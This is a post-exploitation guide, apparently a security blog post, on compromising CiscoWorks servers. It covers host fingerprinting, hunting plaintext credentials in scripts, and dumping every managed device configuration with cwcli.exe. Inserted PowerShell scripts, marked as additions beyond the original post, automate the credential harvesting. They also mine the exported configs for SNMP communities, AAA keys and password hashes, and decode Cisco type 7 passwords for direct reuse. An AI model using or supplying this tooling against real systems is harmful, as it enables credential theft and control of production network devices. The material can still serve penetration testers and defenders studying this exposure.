Channel: Open Security Research

Hack Tips: CiscoWorks Exploitation

by Tony Lee.

This article is the third in a series (See Hack Tips: Blackberry Enterprise Server and Hack Tips: Good For Enterprise) covering, step-by-step, practical post-exploitation tips that can be used to get the most out of various common network servers. This week’s victim is CiscoWorks. Compromising this server allows the attacker to remotely control network devices and dump all device configurations.

Even though CiscoWorks is End of Life (EOL) and has been replaced by Cisco Prime Infrastructure (CPI), we still see this management product in many environments, so it is still useful to know how to get the goods from Works.

Overview

Overall, the process involves the following steps:
  1. Identifying a CiscoWorks Server
  2. Obtaining CiscoWorks Administrator Credentials
  3. Interfacing with the CiscoWorks Web Interface
  4. Interfacing with the CiscoWorks Command Line Interface
  5. Dumping configs from CiscoWorks


Identifying The Host

  1. Host naming scheme
    • \\CiscoWorksBox
    • \\CISCOWKS
    • \\NETMNG
  2. Application Directory
    • C:\Program Files (x86)\CSCOpx
  3. User accounts
    • casuser (the local account the CiscoWorks services run under; created at install time)

      C:\>net user

      User accounts for \\CiscoWorksDemoBox

      ----------------------------------------------------------
      casuser user user2
      user3
      The command completed successfully.

  4. Services
    • These Windows services are started:

      C:\>net start

      --SNIP--
      CiscoWorks ANI database engine
      CiscoWorks Daemon Manager
      CiscoWorks RME NG database engine
      CiscoWorks Tomcat Servlet Engine
      CiscoWorks Web Server
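The four indicators above can be checked in one pass. The script below is an added example, not part of the original post: it looks for the install directory, the casuser account, the CiscoWorks services, and the web listeners on TCP 1741/443. The install path is the article's default and is an assumption for non-default installs; the script shells out to net.exe and netstat.exe so it also works on the older PowerShell 2.0 hosts CiscoWorks servers tend to be.

```powershell
# Added example, not from the original post: local triage for a CiscoWorks install.
# Checks install directory, casuser account, CiscoWorks services and the 1741/443 listeners.
# PowerShell 2.0-compatible: uses net.exe/netstat.exe instead of Get-LocalUser/Get-NetTCPConnection.

function Test-CiscoWorksHost {
    param(
        # Default install path from the article; override for non-default installs (assumption).
        [string]$InstallDir = "${env:ProgramFiles(x86)}\CSCOpx"
    )

    # 'net user <name>' exits 0 only when the local account exists.
    $null = & net.exe user casuser 2>&1
    $casuserPresent = ($LASTEXITCODE -eq 0)

    # Every CiscoWorks service carries the product name in its display name.
    $services = @(Get-Service | Where-Object { $_.DisplayName -like 'CiscoWorks*' } |
        ForEach-Object { '{0} ({1})' -f $_.DisplayName, $_.Status })

    # Web UI: TCP 1741 (HTTP) and TCP 443 (HTTPS). 'netstat -ano' appends the owning PID.
    $listeners = @(& netstat.exe -ano | Where-Object {
        $_ -match '^\s*TCP\s+\S+:(1741|443)\s+\S+\s+LISTENING\s+\d+'
    } | ForEach-Object { ($_ -replace '\s+', ' ').Trim() })

    $dirPresent = Test-Path -LiteralPath $InstallDir
    New-Object PSObject -Property @{
        InstallDirPresent = $dirPresent
        CasuserPresent    = $casuserPresent
        Services          = $services
        Listeners         = $listeners
        LikelyCiscoWorks  = $dirPresent -and ($services.Count -gt 0)
    }
}

Test-CiscoWorksHost | Format-List
```

Run it from any shell on the suspected box; an empty Services list with the directory present usually means the daemons are stopped rather than absent, so check the directory and account before ruling the host out.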


Identifying CiscoWorks Account Credentials

  1. Dump the local Windows password hashes and crack them
  2. Data mine the CiscoWorks box for .bat and .txt files that contain plaintext credentials. This is surprisingly successful: network engineers are usually the ones managing CiscoWorks, and they tend to script around it with hard-coded credentials. We recently found a test .bat file that called ut.exe (a CiscoWorks tool) with the CiscoWorks credentials in plain text on the command line. The /M switch below prints only the names of matching files, which keeps the sweep fast to review:
    • findstr /I /S /M pass c:\*
    • dir /a /s /b c:\*pass*
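The findstr sweep is noisy on a large drive. As an added example (not from the original post), the function below narrows the search to text-like files and pulls the username and password straight out of cwcli.exe invocations; it treats ut.exe the same way on the assumption that it takes -u/-p too, which is not taken from its documentation. The sample .bat it scans is constructed here for demonstration.

```powershell
# Added example, not from the original post: hunt for plaintext CiscoWorks credentials in scripts.
# Narrows the search to text-like files and extracts -u/-p from cwcli.exe (and, assumed, ut.exe) calls.

function Find-CiscoWorksCredentials {
    param(
        [string[]]$Roots = @("$env:SystemDrive\"),
        [string[]]$Extensions = @('.bat', '.cmd', '.txt', '.ps1', '.vbs', '.ini', '.log'),
        [long]$MaxBytes = 5MB    # skip large logs/binaries
    )

    # e.g.  cwcli export config -u admin -p S3cret -device %
    $toolPattern = '(?i)\b(cwcli|ut)(\.exe)?\b.*?-u\s+(\S+).*?-p\s+(\S+)'
    # e.g.  password=S3cret   PASS: S3cret
    $assignPattern = '(?i)\bpass(word|wd)?\s*[=:]\s*\S+'
    $hits = @()

    foreach ($root in $Roots) {
        Get-ChildItem -LiteralPath $root -Recurse -Force -ErrorAction SilentlyContinue |
          Where-Object { -not $_.PSIsContainer -and
                         $Extensions -contains $_.Extension.ToLower() -and
                         $_.Length -le $MaxBytes } |
          ForEach-Object {
            $file = $_.FullName
            try { $lines = [System.IO.File]::ReadAllLines($file) } catch { return }  # locked/unreadable
            for ($n = 0; $n -lt $lines.Length; $n++) {
                $line = $lines[$n]
                if ($line -match $toolPattern) {
                    $hits += New-Object PSObject -Property @{
                        File = $file; Line = $n + 1; Kind = 'cwcli/ut credential'
                        User = $Matches[3]; Secret = $Matches[4]; Text = $line.Trim() }
                } elseif ($line -match $assignPattern) {
                    $hits += New-Object PSObject -Property @{
                        File = $file; Line = $n + 1; Kind = 'password assignment'
                        User = $null; Secret = $null; Text = $line.Trim() }
                }
            }
          }
    }
    $hits
}

# Constructed sample (not a real find) so the function can be exercised offline.
$demoDir = Join-Path $env:TEMP 'cw_demo'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
@'
@echo off
rem nightly config pull - TODO move creds out of here
cd "C:\Program Files (x86)\CSCOpx\bin"
cwcli.exe export config -u cwadmin -p Summer2011! -device %
'@ | Set-Content -Path (Join-Path $demoDir 'nightly.bat')

Find-CiscoWorksCredentials -Roots $demoDir | Format-Table Kind, User, Secret, File -AutoSize
```

Point -Roots at the system drive (the default) for a real sweep; the CSCOpx tree and the network team's home directories are the usual places the hits come from.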


Interacting with CiscoWorks

Next we'll take a look at how we can interact with CiscoWorks and pull data from it.

Using the CiscoWorks Web Interface


CiscoWorks interface and options post-authentication

Source: http://www.netadmin.calpoly.edu/tools/cv-images/homepage.jpg

Browse to either of the URLs below; the web interface gives a quick visual summary of the managed network and is the easiest way to see what the server knows about:
  • http://hostname:1741
  • https://hostname

From the local system, you can confirm CiscoWorks is listening by checking for a listener on TCP 1741 (HTTP) or TCP 443 (HTTPS); both belong to the same web server process:

C:\> netstat -ano | findstr 1741
TCP 0.0.0.0:1741 0.0.0.0:0 LISTENING 5136

C:\>netstat -ano | findstr 443
TCP 0.0.0.0:443 0.0.0.0:0 LISTENING 5136


Using the CiscoWorks Command Line Application

The CiscoWorks command line application (cwcli.exe) has tons of options, including remotely running commands on managed devices! This could be very useful for an attacker, but use it with caution: commands pushed through cwcli land on production routers and switches, and a mistake can really get you into trouble if you don't know what you're doing.

Running cwcli.exe is more or less straightforward, but you'll definitely have to check out the -help output for the full feature list.


C:\Program Files (x86)\CSCOpx\bin>cwcli.exe -help
------------------------------------
CiscoWorks command line Application.
------------------------------------
General syntax to run a command with arguments is
cwcli <application> <command> <arguments>

For detailed help on a command and it's arguments, run
cwcli <application> <command> -help

Dumping Device Configs from CiscoWorks

One noteworthy feature of cwcli.exe is its ability to dump device configurations from the command line! Given enough time, you could obtain every config from every device CiscoWorks manages. Here's how to tell cwcli.exe to grab those configs (substitute the CiscoWorks credentials you recovered earlier):


C:\Program Files (x86)\CSCOpx\bin>cwcli.exe export config -u <username> -p <password> -device %

SUMMARY
========
Successful: ConfigExport: C:/PROGRA~2/CSCOpx/files/rme/cwconfig


The % character is a wildcard when using cwcli.exe. Using it, you could potentially dump the configuration of every CiscoWorks-managed device! Just note that this can take a really long time on a large network. It's also worth noting that, as a general best practice, system administrators should never use the -p option to put the password on the command line, including within scripts and scheduled tasks: anything on a command line is visible to other users of the box through process listings (for example wmic process get name,commandline) and is exactly the sort of thing the file-hunting step above turns up.

And just to confirm we dumped some configurations:

C:\Program Files (x86)\CSCOpx\bin>dir ..\files\rme\cwconfig
Volume in drive C has no label.
Volume Serial Number is 0000-0000

Directory of C:\Program Files (x86)\CSCOpx\files\rme\cwconfig

12/25/2011 06:40 PM <DIR> .
12/25/2011 06:40 PM <DIR> ..
12/25/2011 06:40 PM 26,621 2011-11-09-06-40-28-950-devicename.xml
12/25/2011 06:40 PM 26,768 2011-11-09-06-40-29-919-devicename.xml
12/25/2011 06:40 PM 30,782 2011-11-09-06-40-30-294-devicename.xml
12/25/2011 06:40 PM 27,441 2011-11-09-06-40-30-591-devicename.xml
12/25/2011 06:40 PM 30,656 2011-11-09-06-40-30-841-devicename.xml
12/25/2011 06:40 PM 30,833 2011-11-09-06-40-31-247-devicename.xml
6 File(s) 173,101 bytes
2 Dir(s) 129,615,876,096 bytes free
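The exported files are the real prize, so it is worth going one step past the post and mining them. The script below is an added example, not part of the original post, and deliberately goes beyond the text: it treats every file in files\rme\cwconfig as plain text (the only assumption about the export format is that the device running-config lines appear verbatim inside the XML), flags SNMP communities, AAA shared keys and password hashes, and decodes Cisco type 7 strings, which are only XOR-obfuscated against a fixed, well-known key. The sample export file it scans is constructed here and its hash is fake.

```powershell
# Added example, not from the original post: mine exported configs for device secrets.
# Assumes running-config lines appear verbatim in the cwconfig XML; no schema is parsed.
# Type 7 strings are decoded (reversible); type 5/8/9 hashes are reported for offline cracking.

$Type7Key = 'dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv9873254k;fg87'

function ConvertFrom-CiscoType7 {
    param([Parameter(Mandatory = $true)][string]$Encoded)
    # Layout: two decimal digits = starting offset into the key, then one hex byte per plaintext char.
    if ($Encoded -notmatch '^\d{2}(?:[0-9A-Fa-f]{2})+$') { throw "Not a type 7 string: $Encoded" }
    $offset = [int]$Encoded.Substring(0, 2)
    $hex = $Encoded.Substring(2)
    $plain = New-Object System.Text.StringBuilder
    for ($i = 0; $i -lt $hex.Length; $i += 2) {
        $byte = [Convert]::ToInt32($hex.Substring($i, 2), 16)
        $keyChar = [int][char]$Type7Key[($offset + $i / 2) % $Type7Key.Length]
        [void]$plain.Append([char]($byte -bxor $keyChar))
    }
    $plain.ToString()
}

function Find-ConfigSecrets {
    param([string]$ConfigDir = "${env:ProgramFiles(x86)}\CSCOpx\files\rme\cwconfig")
    $findings = @()
    Get-ChildItem -LiteralPath $ConfigDir -Filter *.xml -ErrorAction SilentlyContinue | ForEach-Object {
        $file = $_.Name
        foreach ($raw in [System.IO.File]::ReadAllLines($_.FullName)) {
            $line = $raw.Trim(); $kind = $null; $value = $null
            if ($line -match '(?i)\b(?:password|key)\s+7\s+([0-9A-Fa-f]+)\b') {
                $kind = 'type 7 (decoded)'
                try { $value = ConvertFrom-CiscoType7 $Matches[1] } catch { $value = "<undecodable: $($Matches[1])>" }
            } elseif ($line -match '(?i)\b(?:enable secret|username\s+\S+.*?\bsecret)\s+([589])\s+([^\s<]+)') {
                $kind = "type $($Matches[1]) hash (crack offline)"; $value = $Matches[2]
            } elseif ($line -match '(?i)\bsnmp-server community\s+([^\s<]+)') {
                $kind = 'snmp community'; $value = $Matches[1]
            } elseif ($line -match '(?i)\b(?:tacacs|radius)-server\b.*\bkey\s+(?:0\s+)?([^\s<]+)') {
                $kind = 'aaa shared key'; $value = $Matches[1]
            }
            if ($kind) {
                $findings += New-Object PSObject -Property @{ File = $file; Kind = $kind; Value = $value; Line = $line }
            }
        }
    }
    $findings
}

# Constructed sample export (fake hostname and hash) so the scan can be exercised offline.
$demoDir = Join-Path $env:TEMP 'cwconfig_demo'
New-Item -ItemType Directory -Path $demoDir -Force | Out-Null
@'
<config>
hostname core-sw1
enable secret 5 $1$FaKe$abcdefghijklmnopqrstuv
username netops password 7 0822455D0A16
snmp-server community s3cr3tRO RO
tacacs-server host 10.0.0.5 key 7 030A5E1F091F32
radius-server key 0 radiusplain
</config>
'@ | Set-Content -Path (Join-Path $demoDir '2011-11-09-demo-core-sw1.xml')

Find-ConfigSecrets -ConfigDir $demoDir | Format-Table Kind, Value, File -AutoSize
```

Run Find-ConfigSecrets with no arguments on the CiscoWorks box to scan the real export directory. The well-known test vector 0822455D0A16 decodes to cisco, which is a quick way to sanity-check the decoder; anything reported as a type 5/8/9 hash needs an offline cracker, but the type 7 strings, SNMP communities and AAA keys are usable as-is.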



Enjoy!


